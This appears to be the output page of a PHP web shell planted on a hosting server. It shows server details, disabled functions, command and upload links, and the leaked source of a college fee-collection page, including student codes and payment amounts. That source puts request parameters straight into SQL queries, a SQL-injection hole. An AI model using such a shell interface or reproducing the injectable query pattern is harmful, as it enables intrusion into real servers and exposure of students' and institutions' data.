Server IP : 103.191.208.50 / Your IP : 216.73.216.53 Web Server : LiteSpeed System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64 User : celkcksm ( 1031) PHP Version : 7.4.33 Disable Function : show_source, system, shell_exec, passthru, popen, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/celkcksm/ecampus.ncriptech.com/../websites/miereducation.e-campus.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include ("include/makeSession.php"); $installment_id=mysqli_query($con,"select * from admin where id='".$_SESSION["ecomid"]."'"); $installment_id=mysqli_fetch_array($installment_id); $installment_id=$installment_id['menuper']; $menuper=explode(',',$installment_id); if(in_array('B.ED FEES',$menuper)){ }else{ header("location:index.php"); } include("include/header.php"); //include("include/sidebar.php"); if(isset($_REQUEST['upid']) && $_REQUEST['upid']!=''){ $dovalue="editrest"; $doid=$_REQUEST['upid']; $upuserresult=mysqli_query($con,"select * from restaurant where id='".$_REQUEST['upid']."'"); $upuserarr=mysqli_fetch_array($upuserresult); }else{ $dovalue="addrest"; $doid=''; } ?> <div style="background-color:#999"> <div class="content container"> <div class="row cols-wrapper"> <!--//col-md-3--> <div class="col-md-12"> <section class="course-finder"> <h1 class="section-heading text-highlight"><span class="line"> Student Fees Collection </span></h1> <div class="section-content"> <div class="row"> <div class="col-md-2 col-sm-2 subject" style="margin-top: 5px;"> <label for="name">Student Code</label> </div> <div class="col-md-2 col-sm-2 subject" style="margin-top: 5px;"> <input name="ctl00$ContentPlaceHolder1$txtstudcode" type="text" value="FRS18167161" id="ContentPlaceHolder1_txtstudcode" class="form-control" placeholder="Student Code"> </div> <div class="col-md-2 col-sm-2 subject" style="margin-top: 5px;"> <input type="submit" name="ctl00$ContentPlaceHolder1$btnok" value="OK" id="ContentPlaceHolder1_btnok" class="btn btn-theme"> <div> <span id="ContentPlaceHolder1_lblmsg" style="font-size:16pt;"></span> </div> </div> </div> </div> </section> </div> </div> <div class="row cols-wrapper"> <!--//col-md-3--> <div class="col-md-12"> <section class="course-finder"> <h1 class="section-heading text-highlight"><span class="line">Installment Fee </span></h1> <div class="table-responsive"> <div> <table cellspacing="0" rules="all" border="1" id="ContentPlaceHolder1_GridViewstudent" style="border-collapse:collapse;"> <tbody> <tr> <th scope="col">SL.No</th> <th scope="col">Student Code</th> <th scope="col">Installment Amount</th> <th scope="col">Fine Amount</th> <th scope="col">Installment Lastdate</th> <th scope="col"> </th> <th scope="col"> </th> </tr> <tr> <td><span id="ContentPlaceHolder1_GridViewstudent_Labelslno_0">1</span></td> <td><input type="hidden" name="ctl00$ContentPlaceHolder1$GridViewstudent$ctl02$hdninstid" id="ContentPlaceHolder1_GridViewstudent_hdninstid_0" value="308F34"> <span id="ContentPlaceHolder1_GridViewstudent_Labelstudentcode_0">FRS18167161</span></td> <td><span id="ContentPlaceHolder1_GridViewstudent_Labelinstallment_0">50000.00</span></td> <td><span id="ContentPlaceHolder1_GridViewstudent_LabelFine_0">5000</span></td> <td><span id="ContentPlaceHolder1_GridViewstudent_Labelinstallmentlastdate_0">16/02/2018</span></td> <td><input type="submit" name="ctl00$ContentPlaceHolder1$GridViewstudent$ctl02$btnpay" value="Pay" id="ContentPlaceHolder1_GridViewstudent_btnpay_0" style="color:White;background-color:Red;"></td> <td><a id="ContentPlaceHolder1_GridViewstudent_LinkButton1_0" class="btn btn-primary" href='javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("ctl00$ContentPlaceHolder1$GridViewstudent$ctl02$LinkButton1", "", false, "", "EditInstallment.aspx?Ins=308F34&std=FRS18167161", false, true))'>Edit</a></td> </tr> <tr> <td><span id="ContentPlaceHolder1_GridViewstudent_Labelslno_1">2</span></td> <td><input type="hidden" name="ctl00$ContentPlaceHolder1$GridViewstudent$ctl03$hdninstid" id="ContentPlaceHolder1_GridViewstudent_hdninstid_1" value="454371"> <span id="ContentPlaceHolder1_GridViewstudent_Labelstudentcode_1">FRS18167161</span></td> <td><span id="ContentPlaceHolder1_GridViewstudent_Labelinstallment_1">43000.00</span></td> <td><span id="ContentPlaceHolder1_GridViewstudent_LabelFine_1">5000</span></td> <td><span id="ContentPlaceHolder1_GridViewstudent_Labelinstallmentlastdate_1">18/02/2018</span></td> <td><input type="submit" name="ctl00$ContentPlaceHolder1$GridViewstudent$ctl03$btnpay" value="Pay" id="ContentPlaceHolder1_GridViewstudent_btnpay_1" style="color:White;background-color:Red;"></td> <td><a id="ContentPlaceHolder1_GridViewstudent_LinkButton1_1" class="btn btn-primary" href='javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("ctl00$ContentPlaceHolder1$GridViewstudent$ctl03$LinkButton1", "", false, "", "EditInstallment.aspx?Ins=454371&std=FRS18167161", false, true))'>Edit</a></td> </tr> </tbody> </table> </div> <!--//table--> </div> <!--//section-content--> </section> </div> <!--//col-md-3--> </div> <div class="row cols-wrapper"> <!--//col-md-3--> <div class="col-md-12"> <section class="course-finder"> </section> </div> </div> </div> </div> <?php include('include/footer.php');?>